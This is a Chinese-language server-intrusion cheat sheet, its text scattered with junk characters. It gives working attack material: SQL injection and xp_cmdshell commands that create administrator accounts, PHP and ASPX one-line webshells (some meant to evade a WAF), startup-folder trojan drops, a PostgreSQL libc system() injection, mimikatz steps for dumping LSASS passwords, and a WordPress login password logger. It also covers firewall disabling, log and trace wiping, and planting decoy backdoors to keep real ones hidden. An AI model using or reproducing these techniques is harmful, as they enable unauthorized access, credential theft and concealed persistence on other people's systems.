6 v. r, c6 ^3 r4 S1.net user administrator /passwordreq:no 1 G' D4 s& J0 M/ {1 B- G这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了% x, u# _" k% w% P' J( J
2.比较巧妙的建克隆号的步骤 . |& W6 x- \2 p3 Y- w# B9 Q先建一个user的用户 : d& I& }6 V9 t1 Q然后导出注册表。然后在计算机管理里删掉 7 N7 ?5 L' L* d( U0 ?7 w4 Z* N在导入,在添加为管理员组* t9 Q, B# ?, v0 P: o
3.查radmin密码) b$ X% u) P0 Y: G* p- B
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg( v1 R3 n* l }: U
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]' O6 l/ H+ e0 O! k
建立一个"services.exe"的项 5 ~# M K" l4 V6 j6 |再在其下面建立(字符串值) # r* ^+ N8 v8 g键值为mu ma的全路径 & J8 T- N- j* i5.runas /user:guest cmd `& a: |2 \' c# {3 p [ B4 X
测试用户权限! + W9 L. s% h& G6 w6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧? / {& X' X/ w) v: r) k7.入侵后漏洞修补、痕迹清理,后门置放:: k2 q% T" u$ C H2 Q
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门) ^6 V/ H0 b) Z+ N0 a0 S
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c 3 G# n& s* l+ N9 O. W& r! j3 O. M
for example 4 O3 o% z% g* t& F1 Z9 R ; e1 K+ G, k; z& @declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add' 2 N8 Y3 T, w8 h" b# ]# Z( t + N% {2 T- G6 t4 q, q8 udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add' u* D+ \, _. P' R" q5 e, v! b9 ^. C6 y3 o6 z
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了 0 A# ?& T' a5 w如果要启用的话就必须把他加到高级用户模式 6 _% W6 X. C1 P- e) ^ z/ t可以直接在注入点那里直接注入1 J! e2 e- d8 z
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--8 D2 Q; O* z. U& X
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--2 ?' A3 F+ Q8 `" F
或者9 [! \' E& E+ e
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'6 }" p+ \- T: s2 o' _. k8 Z- e- o
来恢复cmdshell。+ j8 [2 _5 D% m
2 o5 N5 a o5 a4 Y9 d) I# Q: c' f
分析器 $ e8 n: R& C4 D8 s2 vEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- ' {8 U0 E! X. i& i& F: ~然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")3 W# Q' r* f7 v4 b( s) r
10.xp_cmdshell新的恢复办法 # |+ a( S" x/ `& x% {xp_cmdshell新的恢复办法 6 Q5 w' X/ k' [9 f; D A扩展储存过程被删除以后可以有很简单的办法恢复:1 B% h; V4 l2 @: E2 x
删除2 K- P4 ~& H- I9 W e! s4 ?4 _* N
drop procedure sp_addextendedproc) O6 K6 {7 H: o7 Q
drop procedure sp_oacreate O c5 Z/ p, H8 G8 w! g2 ?! f4 Mexec sp_dropextendedproc 'xp_cmdshell'5 B$ [* N* o9 a( i/ a: A
, z$ O6 d% t t& H
恢复 1 g" b1 ?% Y0 ]) ~: Tdbcc addextendedproc ("sp_oacreate","odsole70.dll"). A! ]/ m3 T/ \! V/ G2 z$ V" i
dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 0 B0 |3 ^, z9 @9 G: F# G: b6 }* T0 W" R
这样可以直接恢复,不用去管sp_addextendedproc是不是存在 ; @) [' c/ Z, r9 O6 L. H$ @2 j( q/ a+ P2 [- q+ Z
-----------------------------/ t# v0 y4 H" B1 q# [
8 I0 X7 `+ v) h; V+ z; f [0 u删除扩展存储过过程xp_cmdshell的语句:9 l7 L2 ] l w9 w
exec sp_dropextendedproc 'xp_cmdshell' * r; }" D( ~* G# F; o# H9 S4 ~( V: x( i" O
恢复cmdshell的sql语句 . g) ~7 f1 A' Y3 jexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' p q4 Y5 F( O- z; S/ q: l `8 R L: R9 P
5 q A6 L* W" u. }! z2 x( q
开启cmdshell的sql语句 & i; h& T1 X. }# h 5 i6 \( ~7 ^* Cexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' : F4 b) b8 u4 c y+ B% ~+ n( t# }4 b' }9 k. ]
判断存储扩展是否存在 ; I }- r$ a; q6 x0 Aselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' ( K! E- m* u {3 c( X* M5 O返回结果为1就ok) _4 X8 t/ @$ d- ~! Y( P
: I t. X" L! r" U: L( I恢复xp_cmdshell; n& j u$ K1 U7 ?! D2 ]$ ~0 _% v
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' . W) K: d& F7 m- R返回结果为1就ok 8 \. N6 w* T2 M5 J, d2 b i/ E* L2 y6 J: c否则上传xplog7.0.dll0 ]" ` F2 E# V& R' I. a0 Q
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll' . U, p4 P9 @$ @7 c b 7 a+ f6 K% x; s8 w堵上cmdshell的sql语句 - g b; F2 t9 D" Xsp_dropextendedproc "xp_cmdshel 1 k7 F" h; m# T3 X-------------------------; `* ]; | i$ P$ R9 A- D" f
清除3389的登录记录用一条系统自带的命令: 2 _( M% }& O# k2 [: y8 U: Ereg delete "hkcu\Software\Microsoft\Terminal Server Client" /f: J7 v J/ i% k
+ [: b& r0 E4 S8 H
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件 ; N0 R( Y4 h2 r6 G- g$ ?在 mysql里查看当前用户的权限 - ?2 ^$ z; L2 `( _3 d Z5 ^7 w! `+ [* sshow grants for 2 P( s( n/ c5 D/ p8 A) z" _( o9 ?: b6 I- [! G2 \: {$ v) Z
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。8 i# i4 [2 ~" V" u# M
; e. J+ p, y- f8 F2 r+ G; Y8 x% f1 M6 ~$ B' Q- K3 q
Create USER 'itpro'@'%' IDENTIFIED BY '123'; % J9 R7 x8 g6 q! E4 p 1 O- v3 c. g% Q- d6 L( r2 fGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION) R; ^; a# r5 ]
7 w- V9 N! N5 z. t2 a' q! MMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0$ F9 Q& d8 P4 }: p. W
' a [6 c7 b) |0 b0 D% Z% }
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;1 r+ U$ g& c! `7 ^- K$ F$ U1 k
1 m" c' G1 Z6 W4 Q% T搞完事记得删除脚印哟。 / R# k$ F% b* S: p 3 s8 ~, r. B7 R$ Q& L" c- ^Drop USER 'itpro'@'%';1 H$ r1 I# T5 W0 T9 _8 J P- R
/ q5 i% {3 Y* v% W* |: G
Drop DATABASE IF EXISTS `itpro` ;& ^( j! f$ @; w9 x/ `
; P4 _, H2 x0 H6 j1 r& y. O
当前用户获取system权限9 u4 X3 |3 K5 S, j# B% S1 A
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact( U/ b s/ _7 ~. J# U G
sc start SuperCMD5 B8 R1 E0 O# h1 @
程序代码 ! _9 _8 W8 ?; e# U+ T<SCRIPT LANGUAGE="VBScript"> M1 x W' X3 }$ o# yset wsnetwork=CreateObject("WSCRIPT.NETWORK")% P. t) T1 `# G" G; n4 G' c6 A2 V; R
os="WinNT://"&wsnetwork.ComputerName 4 P( o" A7 s4 a3 o! N; uSet ob=GetObject(os) : e' C. a0 }& I/ [( l0 v5 O4 O$ KSet oe=GetObject(os&"/Administrators,group")! v2 E5 n( k6 J" }' o5 u, B
Set od=ob.Create("user","nosec")1 \2 s* C4 U, V3 s
od.SetPassword "123456abc!@#" 5 w- @' R9 Q, V8 Z0 ^ r1 P; h/ Qod.SetInfo 4 r: x$ t# J" _' O% H' F1 I' \Set of=GetObject(os&"/nosec",user) ( d" j) o) @( m5 T! p1 ioe.add os&"/nosec"% C2 z* Q4 o, a8 i$ u; l- l
</Script>7 L8 \ m" B: A' x; z
<script language=javascript>window.close();</script> H* f ~ b) ]( _5 X# d! y
- a% N V* ^9 I9 i+ x5 e( K. x 2 K% t0 w! W& C; d4 D2 ~6 H0 `# O1 n, ~
/ s4 d Q* f4 E# @+ U: ? a( u2 k
突破验证码限制入后台拿shell* l0 V, I) d8 D: j5 C7 ~7 S
程序代码+ A$ U$ d3 c! [+ e3 z
REGEDIT4 2 y3 L0 P! w/ x5 U3 [5 T; l[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 2 l" u& ^- w" x"BlockXBM"=dword:000000007 k4 F5 E. C7 T# j: ?2 U9 P4 `
: f* u/ ?- [* r: Z5 e) L4 O7 t4 C j如上格式 ! Y. n% R; R2 c1 Y# x , d3 {. y: L6 G0 P. b% voracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解 o- X; U0 X( H6 @6 F程序代码 ( i8 l* ~; Q% u# ?select username,password from dba_users; 8 i, K C. b& ~: u- S& f2 W9 W7 x* s2 E# E4 B- o
, z3 t2 o/ m6 F) ?5 ~( D3 W$ Imysql远程连接用户1 Y- I7 G; [1 G/ v* k7 H L
程序代码% l& C& C, _: K' g$ ]
! C. e+ z4 C; }' {& RCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';! T% F% w6 Q1 H: Q5 p# d9 ~
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION8 q, [8 X( Z- A) Z1 A
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 7 m$ r+ w: n& {. T9 `MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;3 v: k0 E5 x5 f) d" R/ d
8 {% i4 A) t! x. P* e: R1 |$ l4 Y, y9 [0 I" F$ r
8 u* O s- \( l4 U/ X
) L. N5 G, S2 C8 v
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0! H4 ]0 T6 X Z7 w: i
& j% A% y0 }6 ?" B+ p
1.查询终端端口+ Y' l9 l0 e6 h3 P: F2 M
/ h* k* N' B. |7 Z, o/ w
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber2 y9 d T# J. ^8 t
e4 i j# b6 N0 s* G
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"( o* J! [6 M! k2 e: b2 n* E
type tsp.reg6 y+ S( `6 J/ v; A0 P" ?& C
& |9 [5 M" M" E. Y' u
2.开启XP&2003终端服务 ) l# D; r% S" d. A- ^$ l$ X: L8 n4 t+ e( e6 Q* x
! m3 j) J3 ]: \+ q$ R" N& z8 \: z
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f: J( I8 a" x1 X6 _6 C2 `, V+ ~
0 |1 K! R# j0 _! ]6 g1 i数据库安全:入侵Oracle数据库常用操作命令 / I1 G* i* M+ K最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。 . C7 B: ?# H1 M% P: U. m) X8 Q1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。 9 p- a1 O1 D; V& k/ [2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;. \# Z# [6 I, Z
3、SQL>connect / as sysdba ;(as sysoper)或 Y7 G4 G/ O6 a4 [# N% F& f
connect internal/oracle AS SYSDBA ;(scott/tiger) & M. U( S: L$ ]$ aconn sys/change_on_install as sysdba;! {4 j/ A B4 B/ r% C. C
4、SQL>startup; 启动数据库实例$ p% B* ^) p% Y( G& { I
5、查看当前的所有数据库: select * from v$database; 0 x$ O4 j# Q8 J4 p* I1 ^select name from v$database;) m. J7 u. J3 X3 [6 l( a
6、desc v$databases; 查看数据库结构字段0 D# e* B5 E% N, ]$ s$ E0 q
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:' G, w# O+ T* Q' k- b! T
SQL>select * from V_$PWFILE_USERS; # N6 j1 e! n6 UShow user;查看当前数据库连接用户 * \' ^* h: X+ w) |$ ]. ]8、进入test数据库:database test; . J6 h) P( q; i# N" y: t9、查看所有的数据库实例:select * from v$instance;+ F: {* p" j4 \2 _# _( X
如:ora9i 5 Y; |. [+ u& x10、查看当前库的所有数据表:% K4 ^; N6 H, @7 E4 C
SQL> select TABLE_NAME from all_tables;% K6 d- m% p+ m5 M) W9 O
select * from all_tables;1 B# C- W$ N+ X6 V$ o3 L7 p
SQL> select table_name from all_tables where table_name like '%u%'; % }6 E* H4 z. c. l, A4 C6 i! k; p/ p hTABLE_NAME. c' C n D3 f! \' k# X
------------------------------ * W/ ]5 _$ ^* @8 o6 [0 a9 }/ g& Y_default_auditing_options_" q8 J/ L0 U( o! d: a, q( U
11、查看表结构:desc all_tables; $ G# X/ o2 L' w' e12、显示CQI.T_BBS_XUSER的所有字段结构: C/ y5 f* V+ {0 P6 Gdesc CQI.T_BBS_XUSER;" N$ D! w+ b: f2 L2 C- ~
13、获得CQI.T_BBS_XUSER表中的记录: 2 g1 \1 D( M. ?8 J$ vselect * from CQI.T_BBS_XUSER;# O0 T. I4 [: f1 z7 u
14、增加数据库用户:(test11/test) 4 [* I5 a- y9 C" o6 O, \8 x8 Bcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp; # Q5 I: T. O6 y15、用户授权: 8 `; p) t0 I4 p- w9 u, o/ M' z/ u! Ugrant connect,resource,dba to test11; K; e2 r9 j( O, Y& }% rgrant sysdba to test11; 3 C% L, @, Z- E$ w8 I7 A$ vcommit;1 G+ w% M8 ^: ^" W, {& A% S% e) c
16、更改数据库用户的密码:(将sys与system的密码改为test.) s* [: P+ F+ G, y4 E) zalter user sys indentified by test;' L# Q1 x2 l: ]( p" D9 {: g `3 `9 U
alter user system indentified by test; 8 ~8 L# a6 a) V# P7 z6 k7 x% d* L) A1 J/ T }
applicationContext-util.xml - ^# F) q A6 x& q3 z3 |applicationContext.xml% T& B9 U) [1 }5 o9 t) F+ c
struts-config.xml. [* o; t& @2 T
web.xml i9 ?5 |# p& Y( \) vserver.xml % \2 t' r- n2 m' Ltomcat-users.xml ! v3 q2 E9 s) w8 d8 d |hibernate.cfg.xml6 Y9 ^: D1 Y7 V. |$ Q9 u- C4 [
database_pool_config.xml & @" D% M5 M+ x& e) E6 V0 s! z0 v# o
7 D& q; @4 K* \0 S\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置" g% j% K( f# } i
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini1 M* N, |4 A4 P" R9 V6 E8 j3 n1 F
\WEB-INF\struts-config.xml 文件目录结构 / ^0 S# _2 }4 s! Z9 m: ^: ~' z1 F) Q: O$ | i P
spring.properties 里边包含hibernate.cfg.xml的名称 ' O( q" B0 }+ x1 A; w; x. M" a6 X# a2 G* B& I4 ~" ]
/ f) n8 G! L8 Z# N" l
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml - `) G/ w0 |5 k8 K s3 Q' p0 p4 w0 J$ Z
如果都找不到 那就看看class文件吧。。$ Y4 G/ r+ L- `2 x4 {# y
5 p, m4 \9 _5 d$ b' U1 q
测试1:+ M3 J9 E6 I. U4 |& y
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1% Y& G0 g5 {3 H+ v1 C
& Q$ x A$ o9 y' o% ^; v8 Z
测试2: 6 m2 Q8 B8 \5 H! l/ J9 q4 V% y' s5 i5 P. E o. M
create table dirs(paths varchar(100),paths1 varchar(100), id int) 7 r) f! R! A! L4 C/ q& G/ b 8 [! j4 i0 I% W. H- e+ j4 qdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1-- t& {7 t( ~, D+ v8 u/ u/ B' A |9 \ q! h$ F" K
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1 : O" b% u; f* g4 ]( ~! m7 p$ c8 [1 t) Q' K+ a5 @
查看虚拟机中的共享文件: ' H9 E I& ~( [- N& [- d在虚拟机中的cmd中执行 % y" |% @7 E9 X) D\\.host\Shared Folders: y% q+ q' A% Y, J8 U
/ @2 H5 h' |- n/ q- k( _4 Tcmdshell下找终端的技巧5 K; G/ a6 K# r. z \2 x& z) w2 k0 I
找终端: % _1 r% \# ~4 E t! v& [- ^+ B
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 0 I, V3 \. \/ F. V; P 而终端所对应的服务名为:TermService ~" d( T& b: F, I2 S% J第二步:用netstat -ano命令,列出所有端口对应的PID值! * n3 h: z% X) {! U 找到PID值所对应的端口/ c5 N3 V' H1 D" a: s
6 D; s# Q, S M; g# e$ Q0 S查询sql server 2005中的密码hash/ s/ E3 i3 }. E
SELECT password_hash FROM sys.sql_logins where name='sa'- ` M3 z" `' W
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a8 {2 |8 p7 e* y; @. Z7 ^- P, Z
access中导出shell $ x" p7 U! @7 O3 N- T, B+ B' ~, v$ t" {& N# d
中文版本操作系统中针对mysql添加用户完整代码:/ z2 x, |# G8 R. z$ f. o- Y9 H
+ [ D- L' J# |& R$ Cuse test;1 |, U2 M0 t! O" L* [
create table a (cmd text);0 m. T+ q: e# T4 x
insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 0 l, [; d l2 @$ ^7 i" uinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " ); & I" V& z" c9 m0 s: |1 Hinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " ); G) p3 P" `( w
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";$ Q7 _; f+ ?1 [
drop table a; & L0 Q t9 L3 h7 k) _ 1 Y$ ~, m4 o8 J$ R) g1 b1 N" j英文版本: 4 J3 \: A0 \* t" R7 l% G/ \& @/ T% d
use test; @, p: J) L8 B" f4 a! d0 o5 ?create table a (cmd text); 4 V+ U& R/ o) |insert into a values ("set wshshell=createobject (""wscript.shell"") " );6 [% K# R; I7 O8 m# I
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " ); S) ?$ v Y6 f$ G% |
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );, a3 V1 W* `* M- }% g
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs"; & C: [( \9 h: ^drop table a;: B% O# F/ _$ L. z( u1 I; ^
' n* i2 h5 F; k) U6 e* H' H) Z( g8 k8 r
create table a (cmd BLOB);3 m$ O9 q: f' h c! H! p8 u1 |
insert into a values (CONVERT(木马的16进制代码,CHAR)); . G: N$ _: |; {select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'- H0 n* {2 K1 }$ r
drop table a; \/ l- H8 P: P
3 {( ?$ a1 U6 k9 S/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- ' `" r5 k& D* f* g
4 l' R! U) }3 r" q L* x
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' % R$ t8 f$ d; j( l1 W5 a: f7 RSTRICT --& d: }4 z( V7 ^ g
, O$ u Q) p3 m/store.php?id=1; SELECT system('uname -a > /tmp/test') -- C) ^) R( d' F! p* D) q
+ C5 O2 }/ i0 I! w/ B/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' -- ; T; M4 b( m# e. l$ [3 m8 k! E, [6 A
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1-- 7 j: a' z6 H! e' _5 {net stop sharedaccess stop the default firewall 8 }1 G% e! J2 w# p/ D: Dnetsh firewall show show/config default firewall ) o. v- L1 B2 ?3 z+ j+ gnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall9 x% ~3 t6 C; a/ @/ D
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall7 J9 Z, {, C; R
修改3389端口方法(修改后不易被扫出) , v/ Y1 F' A5 y ?修改服务器端的端口设置,注册表有2个地方需要修改 / |8 U) N. h1 L( l( g! O; P8 w6 n% f3 Y
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]% T c0 f% [/ W1 y, \ Z) [, u
PortNumber值,默认是3389,修改成所希望的端口,比如6000+ T9 E3 Y, f2 V! O6 `7 r) L
- A/ R1 d7 J" B9 `第二个地方: / B+ r, J# ~8 \) l" I5 L[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ) T; W: h1 |" }; c }) Y
PortNumber值,默认是3389,修改成所希望的端口,比如6000 2 }6 L, t8 x. e& w+ f 9 D9 Z7 F8 t: Z t现在这样就可以了。重启系统就可以了 ' k. K* l: I/ y2 b- D- t! \ ' e8 [0 Z; S5 E查看3389远程登录的脚本 E& X% |' }4 t
保存为一个bat文件 o: |) ?' F T/ |2 vdate /t >>D:\sec\TSlog\ts.log/ F7 M8 _& r& l5 V: y8 Q
time /t >>D:\sec\TSlog\ts.log$ D$ [1 b) v1 ^
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log 3 Q2 {! X6 @# Lstart Explorer j& D% W! E2 _' D8 x2 T" v; B0 R9 g. a Z* t7 K% K
mstsc的参数: ! B/ ~5 S$ T: Z) i- E9 a! P1 U4 ?- D. h9 x; [$ r
远程桌面连接& P9 l. _. [% W7 V7 B' K. j
7 B+ V1 t; l; m9 ~4、 & S0 ^5 c( ~' Z" g * S6 A+ P- I4 k$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";! x; _; {0 v0 {- t
$ O& t. A8 a- T
$gzid("/[discuz]/e",$_POST['h'],"Access");8 b% z2 E5 P- Y h4 Y; B+ \% o0 \
8 S0 L2 r0 l; ]+ b$ M% ^
//菜刀一句话 8 Z# ~, U- x7 e$ J ?0 n$ m) p- S
5、include ($uid); ! A* c$ q; C) v# j# X- ~% L' }% O) \' S6 m. [ T- X8 \
//危险的include函数,直接编译任何文件为php格式运行,POST ! b! W/ ^# T" C- W6 k$ W) e # H) f! v: [. v& z0 m$ t6 T( i, j, [' T* p6 Z) @7 g
//gif插一句话+ v( i. Z# n+ t
% q+ L: U( `3 G% \6、典型一句话) b# S1 B5 `2 f" T
: b. x! g" S! n6 I# ^$ G
程序后门代码2 M# Z1 Z* [: Q2 J! l" q7 \- y
<?php eval_r($_POST[sb])?>3 g$ R& x" y2 w% E
程序代码 1 |9 `9 i$ M" Y, Y" N- g<?php @eval_r($_POST[sb])?> " x3 h1 u O1 g. Y//容错代码) j" \7 o1 u1 B8 a
程序代码 * f: c: S: W9 l<?php assert($_POST[sb]);?> ; c& S) |( t4 r3 c: s" m* o; G//使用lanker一句话客户端的专家模式执行相关的php语句# }7 v% X' a i8 a5 y% E
程序代码, j( n" t- ]& v, Y
<?$_POST['sa']($_POST['sb']);?>9 b( p" M7 G! e; `1 H6 U
程序代码% m y$ Z6 M& O# c. Q& s
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>5 K* F& F. Z) m: P# S
程序代码 8 e# C! z) D Z. B<?php: T [( C; F( j7 w' U, V; _! r- ^
@preg_replace("/[email]/e",$_POST['h'],"error");% H; F5 {* d/ r; e# R0 ?
?> 0 Q5 F1 \ r+ J, p" \6 ]3 T//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 , v; [& r1 `: P- p程序代码+ b% ?; X, v5 U2 `% f- ] T1 P1 @
<O>h=@eval_r($_POST[c]);</O> c. i; b; g, N程序代码 , j5 A7 S- N- @( ]5 i+ }<script language="php">@eval_r($_POST[sb])</script> + o3 i1 n! |/ [& ~6 P- i0 [& r//绕过<?限制的一句话 ! O5 t O: A! h% ?+ k! J( ]+ _1 O5 U" Y# F" _. l9 V3 |' |( r http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip 7 s3 r4 }+ p9 p4 P' `4 W+ y8 Z! @详细用法:0 [, w& Y4 Z5 |
1、到tools目录。psexec \\127.0.0.1 cmd. W, p% t0 R( q
2、执行mimikatz 7 |' I2 g/ I `- b9 ?# K3 F. o3、执行 privilege::debug " j/ f+ M+ {+ p5 c+ H( S4、执行 inject::process lsass.exe sekurlsa.dll - F/ @( i$ ~7 r: W; N% u8 Z5、执行@getLogonPasswords / a/ b, R% h2 r3 x2 k M6、widget就是密码 ' {8 d3 t. u6 v7、exit退出,不要直接关闭否则系统会崩溃。 4 B1 _6 p% b8 E+ Q+ M1 O& Z3 y* \ m& s R- W8 C( Z$ W+ Bhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面; g, j! i# h0 S: B2 T
- \: I- K# w# j- M/ E自动查找系统高危补丁' w- {% R; T% V! p% R: W* a
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt6 i; E, P) q7 m3 i3 l& d
3 X, O) ?+ w# a' r; s突破安全狗的一句话aspx后门4 U! n. S z: i- p
<%@ Page Language="C#" ValidateRequest="false" %> " D5 U* _0 V0 N) k; {<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%> N5 k* _2 k! E0 m
webshell下记录WordPress登陆密码/ p9 a6 I# n# Q6 y& a8 y6 J
webshell下记录Wordpress登陆密码方便进一步社工8 k# }& u% L; U$ Z. n( P
在文件wp-login.php中539行处添加: 8 n" C+ |4 [4 V; _! W+ i- @8 X, I, Q8 H// log password $ N1 m5 L7 y# A0 A/ y$log_user=$_POST['log']; ) p) p* {. X4 x% l, d) m4 i7 `$log_pwd=$_POST['pwd']; . Z1 ^# U- z% m5 ~* S) ~4 \$log_ip=$_SERVER["REMOTE_ADDR"];5 h0 [$ u) h8 G: B& G! d3 b
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip; , ?0 r; U! }+ @, V# v+ p$txt=$txt.”\r\n”; ' {+ r e9 Q% \! |0 D# h2 H$ pif($log_user&&$log_pwd&&$log_ip){5 J. \8 n: L$ C. ?
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);( P- b/ H. z4 Z% u5 V
} 1 x6 @* G7 v K+ Q: ^" L4 ^当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。 $ @+ S$ Q1 E5 b8 r* g0 |' n* A* m! A就是搜索case ‘login’, D: ]- w: T8 g3 F- T( Y6 y: U' A
在它下面直接插入即可,记录的密码生成在pwd.txt中,- k. ~2 o; y4 i$ I/ k
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录 ( s# `# g& e( a) d1 i" P6 d利用II6文件解析漏洞绕过安全狗代码:& l8 q7 R* p# i( k- K2 g
